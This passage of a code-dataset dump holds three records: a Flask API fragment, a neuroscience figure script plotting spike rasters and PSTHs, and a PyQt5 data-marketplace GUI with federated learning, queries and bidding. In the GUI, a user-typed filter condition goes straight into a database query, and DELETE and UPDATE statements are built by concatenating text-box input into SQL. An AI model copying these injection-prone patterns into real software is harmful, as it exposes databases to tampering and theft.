headers = headers)\n\n except Exception as er:\n raise er\n\n return jsonify({\"getSummary\" : resp.text})\n\n\n\nif __name__ == \"__main__\":\n\n app.run(host='10.6.7.88', port = 9000)\n","repo_name":"kathirm/TNPLTRPA","sub_path":"attndAPi.py","file_name":"attndAPi.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38273466585","text":"import os\nimport numpy as np\nfrom jaratoolbox import spikesanalysis\nfrom jaratoolbox import celldatabase\nfrom jaratoolbox import ephyscore\nfrom jaratoolbox import settings\nfrom jaratoolbox import extraplots\nimport figparams\nreload(figparams)\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\n\n# dbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_ALLCELLS.h5')\n# dbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_ALLCELLS_MODIFIED_CLU.h5')\ndbPath = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, 'celldatabase_calculated_columns.h5')\n# db = pd.read_hdf(dbPath, key='dataframe')\ndb = celldatabase.load_hdf(dbPath)\n\nFIGNAME = 'figure_noise_laser'\n# outputDir = os.path.join(settings.FIGURES_DATA_PATH, figparams.STUDY_NAME, FIGNAME)\noutputDir = '/tmp'\nfigFilename = 'plots_noise_laser' # Do not include extension\nfigFormat = 'svg' # 'pdf' or 'svg'\n\n\n\n# figSize = [13, 6] # In inches\n\nfullPanelWidthInches = 6.9\nfigSizeFactor = 2\nfigWidth = fullPanelWidthInches * (figSizeFactor)\nfigHeight = figWidth / 2.16\nfigSize = [figWidth, figHeight] # In inches\n\n\nSAVE_FIGURE=1\n\nplt.clf()\ngs = gridspec.GridSpec(2, 3)\ngs.update(top=0.95, bottom=0.08, hspace=0.5)\nplt.hold(1)\n\nlabelPosX = [0.02, 0.34, 0.66] # Horiz position for panel labels\nlabelPosY = [0.43, 0.94] # Vert position for panel labels\n\nfontSizeLabels = figparams.fontSizeLabels * figSizeFactor\nfontSizeTicks = figparams.fontSizeTicks * figSizeFactor\nfontSizePanel = figparams.fontSizePanel * figSizeFactor\n\naxThalCartoon = plt.subplot(gs[0,0])\naxThalCartoon.axis('off')\naxACCartoon = plt.subplot(gs[1,0])\naxACCartoon.axis('off')\n\ngsThalResp = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gs[0, 1], hspace=0.7)\ngsThalNoise = gridspec.GridSpecFromSubplotSpec(2, 1, 
subplot_spec=gsThalResp[0], hspace=0)\naxThalNoiseRaster = plt.subplot(gsThalNoise[0])\naxThalNoisePSTH = plt.subplot(gsThalNoise[1])\n\ngsThalLaser = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsThalResp[1], hspace=0)\naxThalLaserRaster = plt.subplot(gsThalLaser[0])\naxThalLaserPSTH = plt.subplot(gsThalLaser[1])\n\ngsACResp = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gs[1, 1], hspace=0.5)\ngsACNoise = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsACResp[0], hspace=0)\naxACNoiseRaster = plt.subplot(gsACNoise[0])\naxACNoisePSTH = plt.subplot(gsACNoise[1])\n\ngsACLaser = gridspec.GridSpecFromSubplotSpec(2, 1, subplot_spec=gsACResp[1], hspace=0)\naxACLaserRaster = plt.subplot(gsACLaser[0])\naxACLaserPSTH = plt.subplot(gsACLaser[1])\n\naxThalSites = plt.subplot(gs[0, 2])\naxThalSites.axis('off')\naxACSites = plt.subplot(gs[1, 2])\naxACSites.axis('off')\n\n\nthalExample = {'cluster': 2,\n 'date': '2017-02-15',\n 'depth': 2902.0,\n 'subject': 'pinp015',\n 'tetrode': 8}\n\n#Good noise response but only onset laser response\n# thalExample = {'cluster': 3,\n# 'date': '2017-11-16',\n# 'depth': 3046.0,\n# 'subject': 'pinp026',\n# 'tetrode': 4}\n\nacExample = {'cluster': 5,\n 'date': '2017-02-02',\n 'depth': 1275.0,\n 'subject': 'pinp015',\n 'tetrode': 1}\n\n#This example is noisey and not as good\n# acExample = {'cluster': 6,\n# 'date': '2017-03-09',\n# 'depth': 1904.0,\n# 'subject': 'pinp016',\n# 'tetrode': 6}\n\nindRowThal, rowThal = celldatabase.find_cell(db, **thalExample)\nindRowAC, rowAC = celldatabase.find_cell(db, **acExample)\n\n## -- Plot colors -- ##\ncolorNoise = figparams.colp['sound']\ncolorLaser = figparams.colp['blueLaser']\ncolorPSTH = 'k'\ncolorRaster = 'k'\nstimLineWidth = 4\npsthLineWidth = 2\nrasterMS = figparams.rasterMS\n\n## -- Raster/PSTH parameters --##\nstimLineOffsetFrac = 0.2\nalignmentRange = [-0.2, 0.6]\ndisplayRange = [-0.1, 0.3]\nbinsize = 10 #in milliseconds\nbinEdges = np.around(np.arange(alignmentRange[0]-(binsize/1000.0), alignmentRange[1]+2*(binsize/1000.0), (binsize/1000.0)), decimals=2)\nsmoothPSTH = True\nsmoothWinSize = 1\nwinShape = np.concatenate((np.zeros(smoothWinSize),np.ones(smoothWinSize))) # Square (causal)\nwinShape = winShape/np.sum(winShape)\npsthTimeBase = np.linspace(alignmentRange[0], alignmentRange[1], num=len(binEdges)-1)\n\n## -- Thalamus Noise -- ##\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'noiseburst'\ncell = ephyscore.Cell(rowThal)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxThalNoiseRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.',\n ms=rasterMS, rasterized=True)\naxThalNoiseRaster.set_xlim(displayRange)\naxThalNoiseRaster.axis('off')\n\nthalNoiseLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxThalNoiseRaster.plot([0, 0.1], [thalNoiseLineY, thalNoiseLineY], lw=stimLineWidth, color=colorNoise,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxThalNoisePSTH.plot(psthTimeBase, ratePSTH, '-',\n 
color=colorPSTH, lw=psthLineWidth)\naxThalNoisePSTH.set_xlim(displayRange)\nextraplots.boxoff(axThalNoisePSTH)\naxThalNoisePSTH.set_ylim([0, max(ratePSTH)])\naxThalNoisePSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxThalNoisePSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxThalNoisePSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axThalNoisePSTH, fontSizeTicks)\n\n## -- Thalamus Laser -- ##\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'laserpulse'\ncell = ephyscore.Cell(rowThal)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxThalLaserRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxThalLaserRaster.set_xlim(displayRange)\naxThalLaserRaster.axis('off')\n\nthalLaserLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxThalLaserRaster.plot([0, 0.1], [thalLaserLineY, thalLaserLineY], lw=stimLineWidth, color=colorLaser,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxThalLaserPSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxThalLaserPSTH.set_xlim(displayRange)\nextraplots.boxoff(axThalLaserPSTH)\naxThalLaserPSTH.set_ylim([0, max(ratePSTH)])\naxThalLaserPSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxThalLaserPSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxThalLaserPSTH.set_xlabel('Time (s)', fontsize=fontSizeLabels, labelpad=-8)\naxThalLaserPSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axThalLaserPSTH, fontSizeTicks)\n\n#AC Noise\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'noiseburst'\ncell = ephyscore.Cell(rowAC)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxACNoiseRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxACNoiseRaster.set_xlim(displayRange)\naxACNoiseRaster.axis('off')\n\nacNoiseLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxACNoiseRaster.plot([0, 0.1], [acNoiseLineY, acNoiseLineY], lw=stimLineWidth, color=colorNoise,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxACNoisePSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxACNoisePSTH.set_xlim(displayRange)\nextraplots.boxoff(axACNoisePSTH)\naxACNoisePSTH.set_ylim([0, max(ratePSTH)])\naxACNoisePSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxACNoisePSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxACNoisePSTH.set_xticks([0, 
0.3])\nextraplots.set_ticks_fontsize(axACNoisePSTH, fontSizeTicks)\n\n#AC Laser\nspikeTimesFromEventOnset = None\ntrialIndexForEachSpike = None\nindexLimitsEachTrial = None\nsessiontype = 'laserpulse'\ncell = ephyscore.Cell(rowAC)\nephysData, bdata = cell.load(sessiontype)\nspikeTimes = ephysData['spikeTimes']\neventOnsetTimes = ephysData['events']['stimOn']\n(spikeTimesFromEventOnset,\n trialIndexForEachSpike,\n indexLimitsEachTrial) = spikesanalysis.eventlocked_spiketimes(spikeTimes,\n eventOnsetTimes,\n alignmentRange)\naxACLaserRaster.plot(spikeTimesFromEventOnset, trialIndexForEachSpike, 'k.', ms=rasterMS, rasterized=True)\naxACLaserRaster.set_xlim(displayRange)\naxACLaserRaster.axis('off')\n\nacLaserLineY = max(trialIndexForEachSpike) + max(trialIndexForEachSpike)*stimLineOffsetFrac\naxACLaserRaster.plot([0, 0.1], [acLaserLineY, acLaserLineY], lw=stimLineWidth, color=colorLaser,\n clip_on=False)\n\nspikeCountMat = spikesanalysis.spiketimes_to_spikecounts(spikeTimesFromEventOnset,\n indexLimitsEachTrial, binEdges)\nthisPSTH = np.mean(spikeCountMat,axis=0)\nif smoothPSTH:\n thisPSTH = np.convolve(thisPSTH, winShape, mode='same')\nratePSTH = thisPSTH/float(binsize/1000.0)\naxACLaserPSTH.plot(psthTimeBase, ratePSTH, '-',\n color=colorPSTH, lw=psthLineWidth)\naxACLaserPSTH.set_xlim(displayRange)\nextraplots.boxoff(axACLaserPSTH)\naxACLaserPSTH.set_ylim([0, max(ratePSTH)])\naxACLaserPSTH.set_yticks([0, np.floor(np.max(ratePSTH))])\naxACLaserPSTH.set_ylabel('spk/s', fontsize=fontSizeLabels)\naxACLaserPSTH.set_xlabel('Time (s)', fontsize=fontSizeLabels, labelpad=-8)\naxACLaserPSTH.set_xticks([0, 0.3])\nextraplots.set_ticks_fontsize(axACLaserPSTH, fontSizeTicks)\n\n\n\naxACLaserPSTH.annotate('A', xy=(labelPosX[0],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('B', xy=(labelPosX[1],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('C', xy=(labelPosX[2],labelPosY[1]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('D', xy=(labelPosX[0],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('E', xy=(labelPosX[1],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\naxACLaserPSTH.annotate('F', xy=(labelPosX[2],labelPosY[0]), xycoords='figure fraction',\n fontsize=fontSizePanel, fontweight='bold')\n\nif SAVE_FIGURE:\n extraplots.save_figure(figFilename, figFormat, figSize, outputDir)\n\nplt.show()\n\n","repo_name":"sjara/jaratest","sub_path":"common/2018thstr/figure_example_noise_laser.py","file_name":"figure_example_noise_laser.py","file_ext":"py","file_size_in_byte":12520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"25460671087","text":"#coding = 'utf-8'\n\nfrom database_funs import * # database helper functions\nfrom vertical_federated_learning import * # vertical federated learning functions\nfrom horizonal_federated_learning import * # horizontal federated learning functions\n\nfrom PyQt5.QtWidgets import QPlainTextEdit, QFileDialog, QButtonGroup, QInputDialog, QLabel, QWidget, QPushButton, QApplication, QHBoxLayout, QVBoxLayout, QDialog, QLineEdit, QMessageBox, QTableWidget, QAction, QTableWidgetItem, QRadioButton\nfrom PyQt5.QtGui import QFont, QPalette, QPixmap, QBrush, QIcon\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.Qt import *\nimport pandas as pd\nimport numpy as np\n\n# collection of file paths\nICON_PATH = './images/bg_son.jpg'\nWELCOME_BG_PATH = 
\"./images/bg_son.jpg\"\n\n## Middleman main window ########################################################################################################\nclass Window_Middleman_Main(QDialog):\n def __init__(self):\n super().__init__()\n # get the screen resolution\n self.desktop = QApplication.desktop()\n self.screenRect = self.desktop.screenGeometry()\n # set the window geometry\n self.HEIGHT = int(self.screenRect.height() * 0.6)\n self.WIDTH = int(self.screenRect.width() * 0.6)\n self.TOP = int(self.screenRect.height() * 0.2)\n self.LEFT = int(self.screenRect.width() * 0.2)\n # variables inherited from the parent window\n self.middleman_id = None\n self.current_ontable = 'None'\n # build this window's widgets\n self.Init_UI()\n\n def Init_UI(self):\n # window settings\n self.setGeometry(self.LEFT, self.TOP, self.WIDTH, self.HEIGHT) \n self.setWindowTitle('MiniDTM_Middleman')\n self.setWindowIcon(QIcon(ICON_PATH))\n # background image\n palette = QPalette()\n pix=QPixmap(WELCOME_BG_PATH)\n pix = pix.scaled(self.width(),self.height())\n palette.setBrush(QPalette.Background, QBrush(pix))\n self.setPalette(palette)\n # top shared display table\n self.label_table_alldatas = QLabel(self)\n self.label_table_alldatas.setText(\"Current ontable is: \" + str(self.current_ontable))\n self.label_table_alldatas.setStyleSheet(\"color: cornsilk\")\n self.label_table_alldatas.setAlignment(Qt.AlignCenter)\n font_label_table_alldatas = QFont()\n font_label_table_alldatas.setPointSize(12)\n font_label_table_alldatas.setBold(True)\n self.label_table_alldatas.setFont(font_label_table_alldatas)\n self.table_alldatas = QTableWidget(self)\n # 1 raw datasets -> data packages section\n # title\n self.label_integrate2pkg = QLabel(self)\n self.label_integrate2pkg.setText(\"Integrate Rawdatas to Datapkgs\")\n self.label_integrate2pkg.setStyleSheet(\"color: cornsilk\")\n self.label_integrate2pkg.setAlignment(Qt.AlignCenter)\n font_label_integrate2pkg = QFont()\n font_label_integrate2pkg.setPointSize(12)\n font_label_integrate2pkg.setBold(True)\n self.label_integrate2pkg.setFont(font_label_integrate2pkg)\n # input fields and buttons\n self.bt_show_rawdatas = QPushButton('Show Rawdatas', self)\n self.bt_show_rawdatas.clicked.connect(self.show_rawdatas)\n self.bt_integrate2pkg = QPushButton('Integrate Rawdatas', self)\n self.bt_integrate2pkg.clicked.connect(self.integrate2pkg)\n # 2 model training section\n # title\n self.label_federated_learning = QLabel(self)\n self.label_federated_learning.setText(\"Federated_Learning\")\n self.label_federated_learning.setStyleSheet(\"color: cornsilk\")\n self.label_federated_learning.setAlignment(Qt.AlignCenter)\n font_label_federated_learning = QFont()\n font_label_federated_learning.setPointSize(12)\n font_label_federated_learning.setBold(True)\n self.label_federated_learning.setFont(font_label_federated_learning)\n # input fields and buttons\n self.bt_show_modelsets = QPushButton('Show Modelsets', self)\n self.bt_show_modelsets.clicked.connect(self.show_modelsets)\n self.bt_horizontal_federated_learning = QPushButton('Horizontal Federated Learning', self)\n self.bt_horizontal_federated_learning.clicked.connect(self.horizontal_federated_learning)\n self.bt_vertical_federated_learning = QPushButton('Vertical Federated Learning', self)\n self.bt_vertical_federated_learning.clicked.connect(self.vertical_federated_learning)\n # 3 data query section\n # title\n self.label_query = QLabel(self)\n self.label_query.setText(\"Data Query\")\n self.label_query.setStyleSheet(\"color: cornsilk\")\n self.label_query.setAlignment(Qt.AlignCenter)\n font_label_query = QFont()\n font_label_query.setPointSize(12)\n font_label_query.setBold(True)\n self.label_query.setFont(font_label_query)\n # input fields and buttons\n self.bt_show_querysets 
= QPushButton('Show Querysets', self)\n self.bt_show_querysets.clicked.connect(self.show_querysets)\n self.lineedit_queryset_name = QLineEdit(self)\n self.lineedit_queryset_name.setPlaceholderText(\"input queryset name here\")\n self.lineedit_queryset_condition = QLineEdit(self)\n self.lineedit_queryset_condition.setPlaceholderText(\"input filter condition here\")\n self.bt_query = QPushButton('Query', self)\n self.bt_query.clicked.connect(self.query_datas)\n self.bt_release_dataservice = QPushButton('Release', self)\n self.bt_release_dataservice.clicked.connect(self.release_dataservice)\n # 4 bidding handling section\n # title\n self.label_biddings = QLabel(self)\n self.label_biddings.setText(\"Biddings\")\n self.label_biddings.setStyleSheet(\"color: cornsilk\")\n self.label_biddings.setAlignment(Qt.AlignCenter)\n font_label_biddings = QFont()\n font_label_biddings.setPointSize(12)\n font_label_biddings.setBold(True)\n self.label_biddings.setFont(font_label_biddings)\n # input fields and buttons\n self.bt_show_biddings = QPushButton('Show Biddings', self)\n self.bt_show_biddings.clicked.connect(self.show_biddings)\n self.lineedit_datapkg_id = QLineEdit(self)\n self.lineedit_datapkg_id.setPlaceholderText(\"input bidding datapkg id\")\n self.bt_dealing_bidding = QPushButton('Deal With Bidding', self)\n self.bt_dealing_bidding.clicked.connect(self.dealing_bidding)\n # layout setup\n vbox = QVBoxLayout()\n # 0 top shared table\n vbox.addWidget(self.label_table_alldatas)\n vbox.addWidget(self.table_alldatas)\n # 1 raw data area\n vbox.addWidget(self.label_integrate2pkg)\n hbox1 = QHBoxLayout()\n hbox1.addStretch(1)\n hbox1.addWidget(self.bt_show_rawdatas)\n hbox1.addWidget(self.bt_integrate2pkg)\n hbox1.addStretch(1)\n vbox.addLayout(hbox1)\n # 2 model training area\n vbox.addWidget(self.label_federated_learning)\n hbox2 = QHBoxLayout()\n hbox2.addStretch(1)\n hbox2.addWidget(self.bt_show_modelsets)\n hbox2.addWidget(self.bt_horizontal_federated_learning)\n hbox2.addWidget(self.bt_vertical_federated_learning)\n hbox2.addStretch(1)\n vbox.addLayout(hbox2)\n # 3 data query area\n vbox.addWidget(self.label_query)\n hbox3 = QHBoxLayout()\n hbox3.addStretch(1)\n hbox3.addWidget(self.bt_show_querysets)\n hbox3.addWidget(self.lineedit_queryset_name)\n hbox3.addWidget(self.lineedit_queryset_condition)\n hbox3.addWidget(self.bt_query)\n hbox3.addWidget(self.bt_release_dataservice)\n hbox3.addStretch(1)\n vbox.addLayout(hbox3)\n # 4 bidding handling area\n vbox.addWidget(self.label_biddings)\n hbox4 = QHBoxLayout()\n hbox4.addStretch(1)\n hbox4.addWidget(self.bt_show_biddings)\n hbox4.addWidget(self.lineedit_datapkg_id)\n hbox4.addWidget(self.bt_dealing_bidding)\n hbox4.addStretch(1)\n vbox.addLayout(hbox4)\n # done\n self.setLayout(vbox)\n self.show()\n \n # functions for bundling raw datasets into data packages *****************************************************************************\n \n # show raw datasets in the table\n def show_rawdatas(self):\n cols = db_get_col_list('rawdatas') # set columns\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) # set header\n datas = db_get_table_datas('rawdatas') # set rows\n self.flash_table_datas(self.table_alldatas, datas) # refresh the table with the fetched data\n self.current_ontable = 'rawdatas'\n\n # bundle raw datasets into a data package, then price the parts and release them\n def integrate2pkg(self):\n # dialog asking for dataset names; separate multiple names with ;\n text, ok = QInputDialog.getText(self, 'Input Rawdatas Name', 'Divided by ;')\n if(ok):\n if(text==''): # empty input\n QMessageBox.warning(self, \"warning\", \"No input!\")\n return 1\n else:\n rawdatas_list = text.split(\";\")\n print(rawdatas_list)\n # make sure every given dataset name exists in the database\n all_names = []\n datas = 
db_get_table_datas('rawdatas')\n for item in datas:\n all_names.append(item['name'])\n for name in rawdatas_list:\n if(name not in all_names):\n QMessageBox.warning(self, \"warning\", \"rawdatas not found!\")\n return 1\n # dialog to name the package and enter the combined size and accuracy\n # enter the price of the full dataset, then auto-generate n sub-offers\n # release and sync to the database\n # to avoid repeated dialogs, all of this is done in the child window\n window_middleman_sub = Window_Middleman_Sub()\n window_middleman_sub.middleman_id = self.middleman_id\n window_middleman_sub.exec()\n \n # model training functions *****************************************************************************\n \n # show training data in the table\n def show_modelsets(self):\n cols = db_get_col_list('modelsets') # set columns\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) # set header\n datas = db_get_table_datas('modelsets') # set rows\n self.flash_table_datas(self.table_alldatas, datas) # refresh the table with the fetched data\n self.current_ontable = 'modelsets'\n\n # vertical federated learning\n def vertical_federated_learning(self):\n # get the file paths\n res = db_get_table_datas_with_constraint('modelsets','model_mode = \\'vertical\\'')\n file_list = []\n for item in res:\n file_list.append(item['file_path'])\n # start vertical federated learning\n learning_result = fun_vertical_federated_learning(file_list)\n # show the result\n QMessageBox.information(self, \"Learning Completed!\", \"The final model accuracy is \"+str(learning_result))\n\n # horizontal federated learning\n def horizontal_federated_learning(self):\n # get the file paths\n res = db_get_table_datas_with_constraint('modelsets','model_mode = \\'horizonal\\'')\n file_list = []\n for item in res:\n file_list.append(item['file_path'])\n print(\"file_list=\",file_list)\n # start horizontal federated learning\n final_score, real_contribution = horizontal_federated_learning(file_list)\n print('done')\n # show the result\n showcase_str = 'The final score is ' + str(final_score) + '. '\n for i in range(len(real_contribution)):\n showcase_str += 'The contribution of member ' + str(i) + ' is ' + str(real_contribution[i]) + '. 
'\n QMessageBox.information(self, \"Learning Completed!\", showcase_str)\n\n\n # data query functions *****************************************************************************\n\n # show query sets in the table\n def show_querysets(self):\n cols = db_get_col_list('querysets') # set columns\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) # set header\n datas = db_get_table_datas('querysets') # set rows\n self.flash_table_datas(self.table_alldatas, datas) # refresh the table with the fetched data\n self.current_ontable = 'querysets'\n\n # data query service\n def query_datas(self):\n # get and validate input\n queryset_name = self.lineedit_queryset_name.text()\n queryset_condition = self.lineedit_queryset_condition.text()\n if(queryset_name=='' or queryset_condition==''):\n QMessageBox.warning(self, \"warning\", \"Incomplete Input!\")\n return 1\n # fetch data from the db\n self.query_result = db_get_table_datas_with_constraint(queryset_name, queryset_condition)\n # dialog showing the price\n info = db_get_table_datas_with_constraint('querysets', 'name = \\'' + queryset_name + '\\'')\n price = int(info[0]['price']) * len(self.query_result)\n QMessageBox.warning(self, \"warning\", \"This Query Service Needs \"+str(price)+'!')\n # show it in the table\n cols = db_get_col_list(queryset_name) # set columns\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) \n self.flash_table_datas(self.table_alldatas, self.query_result) # refresh the table with the fetched data\n \n # release the queried data as a product; a dialog asks for the product info\n def release_dataservice(self):\n if(len(self.query_result) < 1):\n QMessageBox.warning(self, \"warning\", \"No query info!\")\n return 1\n # dialog asking for the price\n Float, ok = QInputDialog.getDouble(self, 'Input Info', 'Input price here (0~1)', 0.8, 0, 1, 2)\n if(ok):\n price = Float\n # release to the database\n row_list = ['price', 'middleman']\n value_list = [str(price), self.middleman_id]\n db_add_one_row('market_dataservice', row_list, value_list)\n QMessageBox.information(self, \"notion\", 'successfully released!')\n\n \n # auction/bidding handling functions *****************************************************************************\n\n # show bidding data in the table\n def show_biddings(self):\n cols = db_get_col_list('bidding') # set columns\n self.table_alldatas.setColumnCount(len(cols)) \n self.table_alldatas.setHorizontalHeaderLabels(cols[:len(cols)]) # set header\n datas = db_get_table_datas('bidding') # set rows\n self.flash_table_datas(self.table_alldatas, datas) # refresh the table with the fetched data\n self.current_ontable = 'bidding'\n\n # handle bidding\n def dealing_bidding(self):\n # get and validate input\n datapkg_id = self.lineedit_datapkg_id.text()\n if(datapkg_id==''):\n QMessageBox.warning(self, \"warning\", \"Incomplete Input!\")\n return 1\n # dialog asking for the reserve threshold\n Int, ok = QInputDialog.getInt(self, 'Input Info', 'Input reserve bar', 1024, 1, 10000000)\n if(ok):\n reserve_bar = Int\n # fetch all bids\n bidding_result = db_get_table_datas_with_constraint('bidding','datapkg_id = '+datapkg_id)\n # check whether the closing condition is met\n price_list = []\n for i in range(len(bidding_result)):\n price_list.append(bidding_result[i]['price'])\n max2 = np.sort(price_list)[-2]\n max1 = np.sort(price_list)[-1]\n if(max2>max1-reserve_bar): # condition met, sell the product\n # remove the item from market_datapkg\n db = connect2db()\n cursor = db.cursor()\n sql = 'delete from market_dataproduct where id = %s' % datapkg_id\n cursor.execute(sql)\n db.commit()\n cursor.close()\n db.close()\n print(\"remove succeeded\")\n # add a record to history\n for i in range(len(bidding_result)):\n if(bidding_result[i]['price'] == max2):\n buyer = bidding_result[i]['buyer_id']\n row_list = ['name', 'price', 'buyer', 'middleman'] 
# the name column holds the datapkg_id instead\n value_list = [datapkg_id, str(max2), buyer, self.middleman_id]\n db_add_one_row('history', row_list, value_list)\n print(\"insert succeeded\")\n # dialog announcing a successful auction, with the final price and the winner\n QMessageBox.information(self, \"notion\", 'successfully sold! buyer is '+buyer+', price is '+str(max2))\n else: # condition not met, update last_price in market_datapkg\n db = connect2db()\n cursor = db.cursor()\n sql = 'update market_datapkg set lastprice = ' + str(max1-reserve_bar) + ' where id = \\'' + datapkg_id +'\\''\n print(\"sql=\",sql)\n cursor.execute(sql)\n print('success')\n db.commit()\n cursor.close()\n db.close()\n # dialog announcing the auction did not close\n QMessageBox.information(self, \"notion\", 'bidding failed. Last price is ' + str(max1-reserve_bar))\n # whether sold or not, clear the bid records from bidding\n db = connect2db()\n cursor = db.cursor()\n sql = 'delete from bidding where datapkg_id = \\'' + datapkg_id +'\\''\n cursor.execute(sql)\n db.commit()\n cursor.close()\n db.close()\n print(\"all done\")\n # also refresh the table view\n self.show_biddings()\n\n # other shared helper functions ******************************************************************************************************\n\n # from the buyer window\n # using the table header, pick the needed fields out of the full rows and show them\n def flash_table_datas(self, TableWidget, datas):\n TableWidget.setRowCount(len(datas))\n attributes = []\n for i in range(TableWidget.columnCount()):\n attributes.append(TableWidget.horizontalHeaderItem(i).text())\n for i in range(len(datas)):\n pos = 0\n for attribute in attributes:\n TableWidget.setItem(i,pos,QTableWidgetItem(str(datas[i][attribute]))) \n pos += 1 \n\n # from the seller window\n # refresh the top display table from pre-formatted lines\n def flash_table_datas_from_format_lines(self, TableWidget, datas, dimension=2):\n TableWidget.setRowCount(len(datas))\n if(dimension==2):\n for i in range(len(datas)):\n for j in range(len(datas[0])):\n TableWidget.setItem(i, j, QTableWidgetItem(datas[i][j]))\n elif(dimension==1):\n for i in range(len(datas)):\n TableWidget.setItem(i, 0, QTableWidgetItem(datas[i]))\n\n # upload a file into a list of lines\n def upload_file_into_lines(self, split_str=None):\n fname = QFileDialog.getOpenFileName(self, 'Opening File','./')\n format_lines = []\n format_header = []\n if fname[0]:\n # .csv files are assumed to have a header; .txt files are assumed not to, so one is generated\n if (\".txt\" in fname[0]):\n with open(fname[0], 'r',encoding='gb18030',errors='ignore') as f: \n flines = f.read().splitlines()\n for line in flines:\n if(split_str==None):\n format_line = line\n elif(split_str==\" \"):\n format_line = line.split()\n else:\n format_line = line.strip().split(split_str)\n format_lines.append(format_line)\n # auto-generate a numeric header\n if(split_str==None):\n format_header=['0']\n else:\n for i in range(0,len(format_lines[0])): # auto-generate a numeric header\n format_header.append(str(i))\n elif (\".csv\" in fname[0]):\n with open(fname[0], 'r', errors='ignore') as f: \n #with open(fname[0], 'r',encoding='gb18030',errors='ignore') as f: \n flines = f.read().splitlines()\n for i in 